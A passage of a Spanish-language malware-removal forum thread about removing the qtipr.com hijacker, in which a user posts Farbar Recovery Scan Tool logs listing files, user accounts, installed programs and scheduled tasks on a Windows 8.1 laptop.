      2017-02-15 23:47 - 2014-03-18 09:53 - 01833224 _____ C:\WINDOWS\system32\PerfStringBackup.INI
      2017-02-15 23:47 - 2013-08-22 13:36 - 00000000 ____D C:\WINDOWS\Inf
      2017-02-15 23:43 - 2014-09-18 17:48 - 00000000 ____D C:\Users\Alberto\Programas
      2017-02-15 22:29 - 2014-09-16 23:02 - 00000000 ____D C:\Users\Alberto\AppData\Local\Packages
      2017-02-15 20:54 - 2016-11-05 13:00 - 00000000 ____D C:\Users\Alberto\ORLA PAYASADAS
      2017-02-15 09:53 - 2016-07-22 19:48 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\uTorrent
      2017-02-15 09:49 - 2014-10-08 00:29 - 00000000 ____D C:\WINDOWS\Minidump
      2017-02-15 09:49 - 2014-10-01 03:04 - 00000000 ___DC C:\Users\Alberto\AppData\Local\MigWiz
      2017-02-15 09:49 - 2014-04-03 19:15 - 00000000 ____D C:\WINDOWS\Panther
      2017-02-15 09:49 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\ModemLogs
      2017-02-14 23:10 - 2016-09-05 14:54 - 00000000 ____D C:\Program Files (x86)\Google
      2017-02-12 21:18 - 2014-09-16 23:02 - 00000000 ____D C:\Users\Alberto\Documents\My Bluetooth
      2017-02-12 19:44 - 2015-09-19 16:45 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
      2017-02-12 00:10 - 2016-01-23 23:48 - 00000918 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
      2017-02-10 20:46 - 2014-11-12 05:12 - 00000000 ____D C:\Users\Alberto\PROYECTOS CUBASE
      2017-02-10 19:19 - 2014-12-13 23:07 - 00000032 _____ C:\WINDOWS\SysWOW64\w3data.vss
      2017-02-10 19:19 - 2014-12-13 23:07 - 00000032 _____ C:\WINDOWS\SysWOW64\msvcsv60.dll
      2017-02-10 19:19 - 2014-12-13 23:07 - 00000032 _____ C:\WINDOWS\msocreg32.dat
      2017-02-10 15:19 - 2014-05-09 14:34 - 00000000 ____D C:\ProgramData\Package Cache
      2017-02-10 15:17 - 2014-05-09 14:30 - 00000000 ____D C:\Program Files (x86)\Realtek
      2017-02-10 12:40 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\AppReadiness
      2017-02-09 19:15 - 2014-09-16 23:01 - 00000000 ____D C:\Users\Alberto
      2017-02-09 17:05 - 2016-09-02 22:06 - 00000000 ____D C:\Rct
      2017-02-09 17:05 - 2014-10-12 11:40 - 00000000 ____D C:\Muestras
      2017-02-09 12:58 - 2016-07-24 00:18 - 00000282 __RSH C:\ProgramData\ntuser.pol
      2017-02-09 12:57 - 2013-08-22 14:44 - 05283552 _____ C:\WINDOWS\system32\FNTCACHE.DAT
      2017-02-09 12:49 - 2013-08-22 15:36 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
      2017-02-09 12:08 - 2014-11-22 09:02 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Adobe
      2017-02-09 12:06 - 2014-09-18 19:17 - 00000000 ____D C:\Program Files\Adobe
      2017-02-09 12:00 - 2014-10-13 00:09 - 00000000 ____D C:\Users\Public\Documents\Adobe
      2017-02-09 11:51 - 2014-11-22 09:02 - 00000000 ____D C:\ProgramData\Adobe
      2017-02-09 11:34 - 2014-09-18 19:15 - 00000000 ____D C:\Program Files (x86)\Adobe
      2017-02-08 16:34 - 2013-08-22 13:25 - 00000167 _____ C:\WINDOWS\win.ini
      2017-02-07 11:26 - 2015-04-17 15:52 - 00000000 ____D C:\Users\Alberto\PROYECTOS PREMIERE
      2017-01-29 01:44 - 2016-11-28 00:04 - 00000000 ____D C:\Users\Alberto\MEXICO
      2017-01-28 19:23 - 2015-04-10 17:02 - 00000000 ____D C:\Users\Alberto\EXPORTADOS CUBASE
      2017-01-28 08:07 - 2015-01-18 02:56 - 00000000 ____D C:\ProgramData\Skype
      2017-01-25 11:38 - 2016-09-20 01:08 - 00000000 ____D C:\Users\Alberto\ANUNCIO SE BUSCA BAJO
      2017-01-22 17:26 - 2014-09-16 23:02 - 00000000 ____D C:\Users\Alberto\AppData\Local\VirtualStore
      2017-01-21 23:20 - 2015-09-16 00:23 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

      ==================== Files in the root of some directories =======

      2015-05-22 00:15 - 2015-05-22 00:47 - 0000016 _____ () C:\Users\Alberto\AppData\Roaming\msregsvv.dll
      2014-09-16 23:02 - 2017-02-16 21:40 - 2128626 _____ () C:\Users\Alberto\AppData\Local\BTServer.log
      2016-06-16 03:17 - 2016-11-14 01:13 - 0465920 _____ (Dirección General de la Policía) C:\Users\Alberto\AppData\Local\DNIeService.exe
      2016-06-15 23:59 - 2016-06-15 23:59 - 0000017 _____ () C:\Users\Alberto\AppData\Local\resmon.resmoncfg
      2015-10-12 18:30 - 2015-10-12 18:30 - 0000057 _____ () C:\ProgramData\Ament.ini
      2015-05-22 00:15 - 2015-05-22 00:47 - 0000016 _____ () C:\ProgramData\autobk.inc
      2014-05-09 14:39 - 2014-05-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

      ==================== Bamital & volsnap ======================

      (There is no automatic fix for files that do not pass verification.)

      C:\WINDOWS\system32\winlogon.exe => File is digitally signed
      C:\WINDOWS\system32\wininit.exe => File is digitally signed
      C:\WINDOWS\explorer.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
      C:\WINDOWS\system32\svchost.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
      C:\WINDOWS\system32\services.exe => File is digitally signed
      C:\WINDOWS\system32\User32.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
      C:\WINDOWS\system32\userinit.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
      C:\WINDOWS\system32\rpcss.dll => File is digitally signed
      C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
      C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

      LastRegBack: 2017-02-12 04:31

      ==================== End of FRST.txt ============================

    4. #4
      Usuario Avatar de Darkor
      Registrado
      oct 2006
      Ubicación
      España
      Mensajes
      9

      Re: Eliminar qtipr.com

      Archivo Additon del Farbar Recovery

      Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-02-2017 02
      Ran by Alberto (16-02-2017 23:03:37)
      Running from C:\Users\Alberto\Desktop
      Windows 8.1 (Update) (X64) (2014-09-16 23:02:15)
      Boot Mode: Normal
      ==========================================================


      ==================== Accounts: =============================

      Administrador (S-1-5-21-1830392043-3884525579-1098650476-500 - Administrator - Disabled)
      Alberto (S-1-5-21-1830392043-3884525579-1098650476-1002 - Administrator - Enabled) => C:\Users\Alberto
      Invitado (S-1-5-21-1830392043-3884525579-1098650476-501 - Limited - Disabled)
      metal_000 (S-1-5-21-1830392043-3884525579-1098650476-1003 - Limited - Enabled)

      ==================== Security Center ========================

      (If an entry is included in the fixlist, it will be removed.)

      AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
      AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
      AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
      AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

      ==================== Installed Programs ======================

      (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

      µTorrent (HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\uTorrent) (Version: 3.4.8.42576 - BitTorrent Inc.)
      Actualización de NVIDIA 15.3.36 (Version: 15.3.36 - NVIDIA Corporation) Hidden
      Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
      Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
      Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
      Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
      Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated)
      Adobe Flash Player 24 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated)
      Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
      Adobe Media Encoder CC 2017 (HKLM-x32\...\AME_11_0_2) (Version: 11.0.2 - Adobe Systems Incorporated)
      Adobe Photoshop CS2 (HKLM-x32\...\Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0409-1E257A25E34D}) (Version: 9.0 - Adobe Systems, Inc.)
      Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_2) (Version: 11.0.2 - Adobe Systems Incorporated)
      Adobe Premiere Pro CS6 (HKLM-x32\...\{7176B973-6011-43C1-AEBC-2D73FE7C6982}) (Version: 6.0 - Adobe Systems Incorporated)
      Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.4.154 - Adobe Systems, Inc.)
      AmpliTube 3 (HKLM-x32\...\{5DD152A8-BFB3-439E-90CD-5C00C2116E23}) (Version: 3.0.0 - IK Multimedia)
      ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
      Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
      bl (x32 Version: 1.0.0 - Your Company Name) Hidden
      CCleaner (HKLM\...\CCleaner) (Version: 5.27 - Piriform)
      Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
      Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
      Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
      Compatibilidad con Aplicaciones de Apple (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
      Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.65.28.50 - Conexant)
      ConvertHelper 2.2 (HKLM-x32\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF51}_is1) (Version: - DownloadHelper)
      CyberLink PhotoDirector 3 (HKLM-x32\...\InstallShield_{39337565-330E-4ab6-A9AE-AC81E0720B10}) (Version: 3.0.1.4107 - CyberLink Corp.)
      Dependency Package Update (Version: 1.6.29.00 - Lenovo Inc.) Hidden
      Dependency Package Update (Version: 1.6.38.00 - Lenovo Inc.) Hidden
      Dependency Package Update (x32 Version: 1.6.32.00 - Lenovo Group Limited) Hidden
      Dependency Package Update (x32 Version: 1.6.38.00 - Lenovo Group Limited) Hidden
      Dependency Package Update (x32 Version: 1.6.38.01 - Lenovo Group Limited) Hidden
      Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.5.1.1 - Dolby Laboratories Inc)
      Eines de correcció del Microsoft Office 2013: català (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.35 - Lenovo)
      Energy Manager (x32 Version: 1.0.0.35 - Lenovo) Hidden
      Estudio para la mejora del producto HP ENVY 4500 series (HKLM\...\{7AB1C3CE-613B-4078-8FDA-DE70E8A917E7}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
      EZdrummer (HKLM-x32\...\{43E8D9E7-AFC9-4BA3-8106-B95E02B87AB7}) (Version: 1.0 - Toontrack)
      EZdrummer 64-bit (HKLM\...\{80E801DB-5288-4447-AAC2-27F329B61C6E}) (Version: 1.3.3 - Toontrack)
      EZXDfh (HKLM-x32\...\{DB1299AF-9EE0-422B-959E-F4171B2AE0F7}) (Version: 1.0 - Toontrack)
      EZXMetalHeads (HKLM-x32\...\{F4F365AB-BD66-4775-A36A-E3D8055873FD}) (Version: 1.0.0 - Toontrack)
      Ferramentas de verificación de Microsoft Office 2013 - Galego (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      Final Master Trial (HKLM-x32\...\{E622ECC4-4310-4D7B-B401-159E0C22516A}) (Version: - )
      Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
      Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
      HP ENVY 4500 series Ayuda (HKLM-x32\...\{083DCC02-5EB2-48B0-8BFF-F2D367F5AFB7}) (Version: 30.0.0 - Hewlett Packard)
      HP ENVY 4500 series Software básico del dispositivo (HKLM\...\{F1F56388-1766-41E4-BFBE-F23671D56574}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
      HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
      HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
      HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.3.50.9 - Hewlett-Packard Company)
      HP Support Solutions Framework (HKLM-x32\...\{7B649B69-BE85-4011-AFAE-4767BC9D934A}) (Version: 12.5.32.203 - Hewlett-Packard Company)
      HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
      HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
      Intel(R) C++ Redistributables for Windows* on Intel(R) 64 (HKLM-x32\...\{D2437C5C-2D8C-40D2-8059-689AD7239FA3}) (Version: 11.1.048 - Intel Corporation)
      Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
      Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3379 - Intel Corporation)
      Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
      Lenovo Dependency Package (HKLM\...\Lenovo Dependency Package_is1) (Version: 1.6.38.00 - Lenovo Group Limited)
      Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10256 - Realtek Semiconductor Corp.)
      Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.)
      Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden
      Lenovo pointing device (HKLM\...\Elantech) (Version: 11.4.31.1 - ELAN Microelectronic Corp.)
      Lenovo PowerDVD10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5630.52 - CyberLink Corp.)
      Lenovo PowerDVD10 (x32 Version: 10.0.5630.52 - CyberLink Corp.) Hidden
      Malwarebytes Anti-Malware versione 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
      Malwarebytes versión 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
      Manuales de usuario (x32 Version: 3.0.0.3 - Lenovo) Hidden
      Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
      Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
      Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
      Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
      Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
      Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
      Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
      Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
      Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
      Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
      Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
      Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation)
      Microtool version 1.1.0 (HKLM-x32\...\Microtool_is1) (Version: 1.1.0 - Microtool Technologies)
      Native Instruments Abbey Road 60s Drums Vintage (HKLM-x32\...\Native Instruments Abbey Road 60s Drums Vintage) (Version: - Native Instruments)
      Native Instruments Guitar Rig 5 (HKLM-x32\...\Native Instruments Guitar Rig 5) (Version: - Native Instruments)
      Native Instruments Guitar Rig Elements for Maschine (HKLM-x32\...\Native Instruments Guitar Rig Elements for Maschine) (Version: - Native Instruments)
      Native Instruments Komplete Elements Mk2 (HKLM-x32\...\Native Instruments Komplete Elements Mk2) (Version: - Native Instruments)
      Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.5.0.409 - Native Instruments)
      Native Instruments Kontakt Elements Selection R2 (HKLM-x32\...\Native Instruments Kontakt Elements Selection R2) (Version: - Native Instruments)
      Native Instruments Reaktor 5 (HKLM-x32\...\Native Instruments Reaktor 5) (Version: 5.9.3.1344 - Native Instruments)
      Native Instruments Reaktor Elements Selection (HKLM-x32\...\Native Instruments Reaktor Elements Selection) (Version: - Native Instruments)
      Native Instruments Reaktor Spark R2 (HKLM-x32\...\Native Instruments Reaktor Spark R2) (Version: 1.4.0.3 - Native Instruments)
      Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: - Native Instruments)
      NVIDIA Controlador de gráficos 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
      NVIDIA GeForce Experience 2.1.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1.1 - NVIDIA Corporation)
      NVIDIA Software del sistema PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
      Onekey Theater (HKLM-x32\...\{91CC5BAE-A098-40D3-A43B-C0DC7CE263FE}) (Version: 3.0.1.2 - Lenovo)
      Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (Version: 11.0.51108 - Microsoft Corporation) Hidden
      Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
      Panel de control de NVIDIA 340.52 (Version: 340.52 - NVIDIA Corporation) Hidden
      Paquete de controladores de Windows - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo)
      Paquete de controladores de Windows - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
      Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation)
      ph (x32 Version: 1.0.0 - Your Company Name) Hidden
      Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.6.0.10525 - CyberLink Corp.)
      PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
      QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
      REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 3.805.802.010814 - REALTEK Semiconductor Corp.)
      Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.39052 - Realtek Semiconductor Corp.)
      Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
      REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0238 - REALTEK Semiconductor Corp.)
      Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      RollerCoaster Tycoon 3 Platinum (HKLM-x32\...\{907B4640-266B-4A21-92FB-CD1A86CD0F63}) (Version: 1.00.000 - Atari)
      Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
      Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
      SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
      SketchUp 2016 (HKLM\...\{1EE5F772-57F4-4299-8029-68F8A815E896}) (Version: 16.0.19912 - Trimble Navigation Limited)
      Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
      Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
      Steinberg Cubase 5 (HKLM-x32\...\{4A19D6AC-ADE0-4A07-80FF-9C9812C45557}) (Version: 5.1.0 - Steinberg Media Technologies GmbH)
      swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
      The Logo Creator v5.2 (HKLM-x32\...\The Logo Creator v5.2) (Version: - )
      T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 1.0.0 - IK Multimedia)
      Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0C0A-1000-0000000FF1CE}_Office15.PROPLUS_{28C1EB1A-45AC-4B12-887F-98EE0AA0D6DD}) (Version: - Microsoft)
      Update for Skype for Business 2015 (KB3161988) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{E1C47F57-5CCA-4077-96A6-7BFD2A026ECD}) (Version: - Microsoft)
      Update for Skype for Business 2015 (KB3161988) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{E1C47F57-5CCA-4077-96A6-7BFD2A026ECD}) (Version: - Microsoft)
      Update for Skype for Business 2015 (KB3161988) 64-Bit Edition (HKLM\...\{90150000-012B-0C0A-1000-0000000FF1CE}_Office15.PROPLUS_{E1C47F57-5CCA-4077-96A6-7BFD2A026ECD}) (Version: - Microsoft)
      User Manuals (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 3.0.0.3 - Lenovo)
      vs2015_redist x86 (x32 Version: 1.0.0.0 - Realnetworks) Hidden
      WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
      World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
      World of Warcraft Beta (HKLM-x32\...\World of Warcraft Beta) (Version: - Blizzard Entertainment)
      Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (Version: 11.0.51108 - Microsoft Corporation) Hidden
      Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden

      ==================== Custom CLSID (Whitelisted): ==========================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      CustomCLSID: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

      ==================== Scheduled Tasks (Whitelisted) =============

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      Task: {06D56526-9F10-477D-B65A-63E8FE546F14} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
      Task: {0A8A9849-EB9B-4DCA-858C-32DC3AAACBA6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
      Task: {0EBF8667-3555-47E3-BB56-8CFAE022F38A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
      Task: {1152AFEA-D3CE-4F61-95F8-2C2B2ACD86E1} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
      Task: {2097C426-8633-4333-8D04-F487D83D409B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-02-08] (Piriform Ltd)
      Task: {23D93F60-8E6B-46C3-AF5F-859400E20B57} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
